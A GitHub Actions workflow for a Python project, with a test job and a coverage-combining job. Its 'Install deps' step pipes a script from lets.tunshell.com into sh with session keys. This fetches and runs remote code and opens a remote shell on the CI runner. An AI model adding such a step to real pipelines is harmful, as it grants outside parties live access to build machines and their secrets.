name: Cache Collection

on: 
  push:
  workflow_dispatch:

jobs:
  test:
    runs-on: ubuntu-latest
    # strategy:
    #   matrix:
    #     group: [1,2]
    steps:
      - uses: actions/checkout@v2
      - name: Set up Python 3.8
        uses: actions/setup-python@v2
        with:
          python-version: 3.9
      - name: Install deps
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt
          curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T Z19QDAcipLmvS1hhqHC5Dh OeBaLQX0yCnZKHfLBOkulG
          # python ./.github/workflows/script/split_tests 2 tests
      - name: Upload pytest_buckets
        uses: actions/upload-artifact@v4.3.3
        with:
          name: pytest_buckets
          path: pytest_buckets.txt
          overwrite: true
      # - name: Run pytest
      #   run: pytest --cov --splits 5 --group ${{ matrix.group }}
      # - name: Upload coverage
      #   uses: actions/upload-artifact@v2
      #   with:
      #     name: coverage${{ matrix.group }}
      #     path: .coverage

  coverage:
    needs: test
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Set up Python 3.9
        uses: actions/setup-python@v2
        with:
          python-version: 3.9
      - name: Install deps
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt
      - name: Download all artifacts
        # Downloads coverage1, coverage2, etc.
        uses: actions/download-artifact@v2
      - name: Run coverage
        run: |
          coverage combine coverage*/.coverage*
          coverage report --fail-under=100
          coverage xml
      - uses: codecov/codecov-action@v1
